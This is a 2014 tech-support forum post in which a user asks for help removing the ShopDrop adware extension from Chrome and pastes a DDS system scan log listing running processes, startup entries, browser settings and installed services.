Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

ShopDrop (Safesaver variant)


  • This topic is locked This topic is locked
20 replies to this topic

#1 SpaciousSpace

SpaciousSpace

  • Members
  • 43 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Washington
  • Local time:12:37 PM

Posted 04 January 2014 - 05:40 PM

I recently became infected with ShopDrop, which I think is a variant of Safesaver because of the green rollover symbols following random words on different websites as well as drop boxes. I was able to remove the NetoCoUUpppon extension from Chrome, but I can't remove the ShoPDrooP extension because it keeps coming back after a restart of the browser.

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 

Internet Explorer: 8.0.7600.17267  BrowserJavaVersion: 10.7.2
Run by Bri at 14:30:18 on 2014-01-04
Microsoft Windows 7 Home Premium   6.1.7600.0.1252.1.1033.18.3895.1258 [GMT -8:00]
.
AV: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {ADA629C7-7F48-5689-624A-3B76997E0892}
SP: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {16C7C823-5972-5907-58FA-0004E2F9422F}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall *Enabled* {959DA8E2-3527-57D1-4915-924367AD4FE9}
.
============== Running Processes ===============
.
C:\windows\system32\lsm.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\System32\spoolsv.exe
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\windows\system32\rundll32.exe
C:\windows\SysWOW64\rundll32.exe
C:\windows\SysWOW64\svchost.exe -k hpdevmgmt
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe
C:\Program Files\McAfee\MSC\McAPExe.exe
C:\windows\system32\mfevtps.exe
C:\windows\System32\svchost.exe -k HPZ12
C:\windows\SysWOW64\nlssrv32.exe
C:\windows\system32\rundll32.exe
C:\windows\system32\rundll32.exe
C:\windows\SysWOW64\rundll32.exe
C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe
C:\windows\System32\svchost.exe -k HPZ12
C:\windows\SysWOW64\PnkBstrA.exe
C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\windows\system32\taskhost.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
C:\windows\system32\Dwm.exe
C:\windows\Explorer.EXE
C:\windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\System32\igfxpers.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Program Files (x86)\Lenovo\Energy Management\utility.exe
C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe
C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent64.exe
C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
C:\Users\Bri\AppData\Local\Facebook\Update\FacebookUpdate.exe
C:\Users\Bri\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
C:\Users\Bri\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeySupport.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\windows\system32\SearchIndexer.exe
C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\windows\system32\svchost.exe -k HPService
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\DDNi\Lenovo Smile Dock\CenterStage.exe
C:\windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\windows\system32\svchost.exe -k SDRSVC
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files\McAfee\MAT\McPvTray.exe
C:\Program Files (x86)\McAfee Online Backup\MOBKbackup.exe
C:\Program Files (x86)\McAfee Online Backup\MOBKbackup.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\windows\SysWOW64\DllHost.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
c:\PROGRA~2\mcafee\SITEAD~1\saui.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
c:\PROGRA~1\mcafee\msc\mcupdmgr.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.ask.com/?l=dis&o=APN10111&gct=hp
mStart Page = hxxp://www.google.com
uURLSearchHooks: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - <orphaned>
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
uRun: [Steam] "C:\Program Files (x86)\Steam\Steam.exe" -silent
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
uRun: [Google Update] "C:\Users\Bri\AppData\Local\Google\Update\GoogleUpdate.exe" /c
uRun: [Facebook Update] "C:\Users\Bri\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
uRun: [Desura] C:\Program Files (x86)\Desura\desura.exe -autostart
uRun: [DelayShred] "c:\PROGRA~1\mcafee\mqs\ShrCL.EXE" /P1 /q "G:\Flower - Lisa.JPG" "G:\Flower - Bailee.JPG" "G:\Elephant - Bri.JPG" "G:\DSCF7732.JPG" "G:\DSCF7727.JPG" "G:\Beach - Lisa.jpg" "G:\13 Titanium (feat. Sia).m4a" "G:\06 2 Reasons (feat. T.I.).m4a" "G:\DCIM" "G:\Mushroom - Lisa.JPG" "G:\Ladybug - Lisa.JPG"
uRun: [Amazon Cloud Player] "C:\Users\Bri\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe"
mRun: [VeriFaceManager] C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
mRun: [UpdateP2GShortCut] "C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Lenovo\Power2Go" UpdateWithCreateOnce "SOFTWARE\CyberLink\Power2Go\5.0"
mRun: [UCam_Menu] "C:\Program Files (x86)\Lenovo\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Lenovo\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\3.0"
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [mcui_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
mRun: [mcpltui_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
mRun: [AdobeCS5ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
dRunOnce: [WLStart] "C:\Program Files (x86)\Windows Live\Installer\wlstart.exe" /nosearch /nohomepage
dRunOnce: [{90140000-006E-0409-0000-0000000FF1CE}] C:\windows\System32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
dRunOnce: [{91140000-0011-0000-0000-0000000FF1CE}] C:\windows\System32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
StartupFolder: C:\Users\Bri\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Dropbox.lnk - C:\Users\Bri\AppData\Roaming\Dropbox\bin\Dropbox.exe
StartupFolder: C:\Users\Bri\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\FACEBO~1.LNK - C:\Users\Bri\AppData\Local\Facebook\Messenger\2.1.4814.0\FacebookMessenger.exe
StartupFolder: C:\Users\Bri\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ONENOT~1.LNK - C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\LENOVO~1.LNK - C:\Program Files (x86)\DDNi\Lenovo Smile Dock\Delay.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDrives = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Free YouTube to iPod Converter - C:\Users\Bri\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetoipodconverter.htm
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~1\Office14\ONBttnIE.dll/105
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
IE: {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Users\Bri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU\Run IMVU.lnk
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{3349D9E5-FFC7-4C92-98BE-38877D14177D} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{3349D9E5-FFC7-4C92-98BE-38877D14177D}\2456C6B696E6F5E4F575962756C6563737F5246423243464 : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{3349D9E5-FFC7-4C92-98BE-38877D14177D}\348627F6D6563616374743635303 : DHCPNameServer = 192.168.255.249
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= c:\progra~3\winspeed\winspeed.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
x64-Run: [Persistence] C:\windows\System32\igfxpers.exe
x64-Run: [OnekeyStudio] C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe
x64-Run: [IgfxTray] C:\windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\windows\System32\hkcmd.exe
x64-Run: [ETDWare] C:\Program Files (x86)\Elantech\ETDCtrl.exe
x64-Run: [EnergyUtility] C:\Program Files (x86)\Lenovo\Energy Management\utility.exe
x64-Run: [Energy Management] C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe
x64-Run: [cAudioFilterAgent] C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe
x64-Run: [Logitech Download Assistant] C:\windows\System32\rundll32.exe C:\windows\System32\LogiLDA.dll,LogiFetch
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
x64-Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\
FF - prefs.js: browser.search.defaulturl - 
FF - prefs.js: browser.search.selectedEngine - Secure Search
FF - prefs.js: browser.startup.homepage - hxxp://www.ask.com/?l=dis&o=APN10111&gct=hp
FF - prefs.js: keyword.URL - hxxp://search.yahoo.com/search?fr=mcafee&p=
FF - plugin: c:\PROGRA~2\mcafee\msc\npMcSnFFPl.dll
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: C:\Program Files (x86)\McAfee\SiteAdvisor\NPMcFFPlg32.dll
FF - plugin: C:\Program Files (x86)\McAfee\Supportability\MVT\NPMVTPlugin.dll
FF - plugin: C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll
FF - plugin: C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypchub.dll
FF - plugin: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\Bri\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll
FF - plugin: C:\Users\Bri\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll
FF - plugin: C:\Users\Bri\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll
FF - plugin: C:\Users\Bri\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
FF - plugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll
FF - plugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npgtpo3dautoplugin.dll
FF - plugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npo1d.dll
FF - plugin: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll
FF - plugin: C:\windows\SysWOW64\npDeployJava1.dll
FF - plugin: C:\windows\SysWOW64\npmproxy.dll
FF - ExtSQL: !HIDDEN! 2010-11-20 11:59; smartwebprinting@hp.com; C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
.
---- FIREFOX POLICIES ----
FF - user.js: yahoo.ytff.general.dontshowhpoffer - true
.
.
.
.
============= SERVICES / DRIVERS ===============
.
R0 McPvDrv;McPvDrv Driver;C:\windows\System32\drivers\McPvDrv.sys [2013-9-26 74560]
R0 mfehidk;McAfee Inc. mfehidk;C:\windows\System32\drivers\mfehidk.sys [2012-11-9 782360]
R1 mfewfpk;McAfee Inc. mfewfpk;C:\windows\System32\drivers\mfewfpk.sys [2012-11-9 343696]
R1 MOBKFilter;MOBKFilter;C:\windows\System32\drivers\MOBK.sys [2012-5-20 66040]
R2 cvhsvc;Client Virtualization Handler;C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE [2013-4-22 822504]
R2 f1f78e38;WinSpeed;C:\windows\System32\rundll32.exe [2009-7-13 45568]
R2 HomeNetSvc;McAfee Home Network;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2010-8-3 13336]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [2012-10-3 201304]
R2 McAPExe;McAfee AP Service;C:\Program Files\McAfee\MSC\McAPExe.exe [2013-1-31 178048]
R2 McMPFSvc;McAfee Personal Firewall Service;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 McNaiAnn;McAfee VirusScan Announcer;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 mcpltsvc;McAfee Platform Services;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 McProxy;McAfee Proxy Service;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 mfecore;McAfee Anti-Malware Core;C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [2013-1-31 1025232]
R2 mfefire;McAfee Firewall Core Service;C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe [2013-1-31 219272]
R2 mfevtp;McAfee Validation Trust Protection Service;C:\windows\System32\mfevtps.exe [2013-1-31 182752]
R2 MOBKbackup;McAfee Online Backup;C:\Program Files (x86)\McAfee Online Backup\MOBKbackup.exe [2010-4-13 231224]
R2 nlsX86cc;Nalpeiron Licensing Service;C:\Windows\SysWOW64\nlssrv32.exe [2010-11-23 66560]
R2 Oasis2Service;Oasis2Service;C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe [2010-6-23 46080]
R2 sftlist;Application Virtualization Client;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe [2013-6-26 523944]
R2 TeamViewer7;TeamViewer 7;C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe [2012-3-12 2886528]
R2 UNS;Intel® Management & Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [2010-8-3 2320920]
R3 ACPIVPC;Lenovo Virtual Power Controller Driver;C:\windows\System32\drivers\AcpiVpc.sys [2010-8-3 28176]
R3 cfwids;McAfee Inc. cfwids;C:\windows\System32\drivers\cfwids.sys [2012-11-9 70112]
R3 ETD;ELAN PS/2 Port Input Device;C:\windows\System32\drivers\ETD.sys [2010-8-3 167816]
R3 HECIx64;Intel® Management Engine Interface;C:\windows\System32\drivers\HECIx64.sys [2010-8-3 56344]
R3 Impcd;Impcd;C:\windows\System32\drivers\Impcd.sys [2010-8-3 158976]
R3 IntcDAud;Intel® Display Audio;C:\windows\System32\drivers\IntcDAud.sys [2010-8-3 271872]
R3 mfeavfk;McAfee Inc. mfeavfk;C:\windows\System32\drivers\mfeavfk.sys [2012-11-9 311120]
R3 mfefirek;McAfee Inc. mfefirek;C:\windows\System32\drivers\mfefirek.sys [2012-11-9 519576]
R3 mfencbdc;McAfee Inc. mfencbdc;C:\windows\System32\drivers\mfencbdc.sys [2013-11-26 411944]
R3 Sftfs;Sftfs;C:\windows\System32\drivers\Sftfslh.sys [2013-6-26 767144]
R3 Sftplay;Sftplay;C:\windows\System32\drivers\Sftplaylh.sys [2013-6-26 273576]
R3 Sftredir;Sftredir;C:\windows\System32\drivers\Sftredirlh.sys [2013-6-26 28840]
R3 Sftvol;Sftvol;C:\windows\System32\drivers\Sftvollh.sys [2013-6-26 23208]
R3 sftvsa;Application Virtualization Service Agent;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [2013-6-26 207528]
R3 wdmirror;wdmirror;C:\windows\System32\drivers\WDMirror.sys [2010-8-3 11280]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 ReadyComm.DirectRouter;ReadyComm.DirectRouter;C:\windows\System32\IgrsSvcs.exe -k IgrsSvcs --> C:\windows\System32\IgrsSvcs.exe -k IgrsSvcs [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-9-5 171680]
S3 Bridge0;Bridge0;C:\windows\System32\drivers\WDBridge.sys [2010-8-3 79376]
S3 GamesAppService;GamesAppService;C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2010-10-12 206072]
S3 HipShieldK;McAfee Inc. HipShieldK;C:\windows\System32\drivers\HipShieldK.sys [2013-10-15 197704]
S3 IGRS;IGRS;C:\Program Files (x86)\Lenovo\ReadyComm\common\IGRS.exe [2009-7-14 38152]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;C:\windows\System32\drivers\k57nd60a.sys [2009-6-10 270848]
S3 Lenovo ReadyComm AppSvc;Lenovo ReadyComm AppSvc;C:\Program Files\Lenovo\ReadyComm\AppSvc.exe [2010-8-3 509192]
S3 Lenovo ReadyComm ConnSvc;Lenovo ReadyComm ConnSvc;C:\Program Files\Lenovo\ReadyComm\ConnSvc.exe [2010-8-3 579400]
S3 mfencrk;McAfee Inc. mfencrk;C:\windows\System32\drivers\mfencrk.sys [2013-11-26 96112]
S3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;C:\windows\System32\drivers\netw5v64.sys [2009-6-10 5434368]
S3 PS_MDP;ReadyComm Presentation Space Helper Service;C:\windows\System32\IgrsSvcs.exe -k IgrsSvcs --> C:\windows\System32\IgrsSvcs.exe -k IgrsSvcs [?]
S3 Revoflt;Revoflt;C:\windows\System32\drivers\revoflt.sys [2012-6-20 31800]
S3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;C:\windows\System32\drivers\RtsUStor.sys [2010-8-3 242720]
S3 RTL8167;Realtek 8167 NT Driver;C:\windows\System32\drivers\Rt64win7.sys [2010-8-3 239616]
S3 SwitchBoard;Adobe SwitchBoard;C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-2-19 517096]
S3 USBAAPL64;Apple Mobile USB Driver;C:\windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\windows\System32\Wat\WatAdminSvc.exe [2010-10-31 1255736]
S3 wsvd;wsvd;C:\windows\System32\drivers\wsvd.sys [2009-7-21 121840]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-01-04 06:47:35 -------- d-----w- C:\ProgramData\regid.1986-12.com.adobe
2014-01-02 09:38:44 -------- d-----w- C:\Program Files (x86)\ShoPDroop
